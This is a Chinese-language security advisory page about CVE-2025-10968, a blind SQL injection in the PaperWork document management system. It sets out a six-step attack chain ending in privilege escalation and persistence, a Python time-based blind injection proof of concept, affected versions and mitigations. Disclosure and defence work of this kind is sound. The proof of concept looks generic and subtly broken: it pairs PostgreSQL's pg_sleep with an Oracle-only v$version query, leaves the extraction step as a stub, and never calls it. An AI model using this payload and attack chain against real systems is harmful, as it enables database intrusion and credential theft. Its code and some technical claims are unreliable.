CVE-2025-10968 PaperWork Hibernate SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10968

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PaperWork (GG Soft Software Services Inc.)

漏洞概述

CVE-2025-10968是GG Soft Software Services Inc.开发的PaperWork文档管理系统中的一个高危SQL注入漏洞。该漏洞存在于PaperWork 6.1.0.9390至6.1.0.9397版本中，由于在数据库查询时对用户输入的特殊元素未进行充分的安全过滤和转义处理，导致攻击者可以通过构造恶意的SQL语句实现Blind SQL Injection（盲注）攻击。漏洞根源在于Hibernate ORM框架的使用不当，攻击者无需具备管理员权限即可利用此漏洞执行任意SQL命令。此漏洞的CVSS评分高达8.8，属于高危级别，对系统的机密性、完整性和可用性均造成严重影响。攻击者成功利用该漏洞可窃取数据库中的敏感信息，包括用户凭证、业务数据和系统配置信息，甚至可能在特定条件下获得服务器远程代码执行能力。该漏洞由土耳其国家网络安全事件响应中心（USOM）发现并报告，披露日期为2025年11月7日。鉴于该漏洞的严重性和广泛影响范围，使用受影响版本PaperWork的组织应立即采取修复措施。

技术细节

该漏洞是一个典型的存储型Blind SQL Injection（盲注）漏洞，存在于PaperWork系统的数据库查询逻辑中。漏洞产生的根本原因是在使用Hibernate ORM框架进行数据库操作时，未对用户可控的输入参数进行严格的输入验证和SQL语句参数化处理。攻击者可以通过在用户输入字段中注入特制的SQL语句片段，利用Hibernate的HQL查询特性绕过常规的安全过滤机制。由于采用盲注技术，攻击者无法直接获取查询结果，但可以通过观察应用程序的响应时间、错误信息或页面内容变化来推断数据库中的敏感信息。攻击者通常会利用如BENCHMARK、SLEEP等时间延迟函数或条件判断语句来逐步提取数据库内容。成功利用该漏洞需要攻击者具有低权限用户账户（PR:L），攻击向量为网络形式（AV:N），无需用户交互（UI:N）。漏洞影响PaperWork 6.1.0.9390至6.1.0.9397版本，建议升级至6.1.0.9398或更高版本以修复此安全问题。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先访问目标PaperWork系统，识别版本号（6.1.0.9390-9397）并注册低权限账户

STEP 2

步骤2

漏洞探测：通过在搜索框或表单字段中注入测试payload（如单引号、UNION等），观察系统响应以确认SQL注入漏洞存在

STEP 3

步骤3

盲注利用：利用时间盲注或布尔盲注技术，构造条件判断SQL语句，通过响应时间差异推断数据库信息

STEP 4

步骤4

数据提取：逐步提取数据库中的敏感表（如users、documents、config），获取用户名、密码哈希、敏感文档内容等

STEP 5

步骤5

权限提升：利用获取的凭据信息登录管理后台或通过SQL注入直接修改用户权限，实现横向移动

STEP 6

步骤6

持久化控制：在数据库中植入后门或修改应用程序逻辑，确保持久化访问能力

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import time # CVE-2025-10968 PaperWork Blind SQL Injection PoC # Target: PaperWork < 6.1.0.9398 # Type: Time-based Blind SQL Injection TARGET_URL = "http://target.com/paperwork/api/endpoint" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Login to obtain session token""" session = requests.Session() login_data = { "email": USERNAME, "password": PASSWORD } response = session.post(f"{TARGET_URL}/auth/login", json=login_data) return session if response.status_code == 200 else None def extract_data(session, sql_payload): """Extract data using time-based blind SQL injection""" # Sleep for 5 seconds if condition is true payload = f"'; SELECT CASE WHEN ({sql_payload}) THEN pg_sleep(5) ELSE pg_sleep(0) END--" data = {"search": payload} start_time = time.time() response = session.get(f"{TARGET_URL}/search", params=data) elapsed = time.time() - start_time return elapsed > 4 def extract_version(session): """Extract database version""" sql = "SELECT version FROM v$version WHERE rownum=1" return extract_data(session, sql) def main(): session = login() if not session: print("[-] Login failed") return print("[+] Login successful") print("[*] Extracting database information...") # Add extraction logic here print("[+] Done") if __name__ == "__main__": main()

影响范围

PaperWork 6.1.0.9390

PaperWork 6.1.0.9391

PaperWork 6.1.0.9392

PaperWork 6.1.0.9393

PaperWork 6.1.0.9394

PaperWork 6.1.0.9395

PaperWork 6.1.0.9396

PaperWork 6.1.0.9397

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1）使用Web应用防火墙（WAF）配置SQL注入防护规则，拦截包含SQL关键字和特殊字符的可疑请求；2）限制受影响的API端点访问，对低权限用户实施更严格的访问控制策略；3）启用应用层请求日志监控，及时发现异常SQL注入尝试行为；4）考虑在应用层和数据库层之间部署数据库防火墙（DBF），对SQL查询进行实时审核和过滤；5）临时禁用非必要的搜索和查询功能，减少攻击面。但上述措施仅为临时解决方案，根本修复仍需升级到官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-10968
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-10968
3 Details https://www.cvedetails.com/cve/CVE-2025-10968/
4 VulDB https://vuldb.com/cve/CVE-2025-10968
5 Link https://www.usom.gov.tr/bildirim/tr-25-0381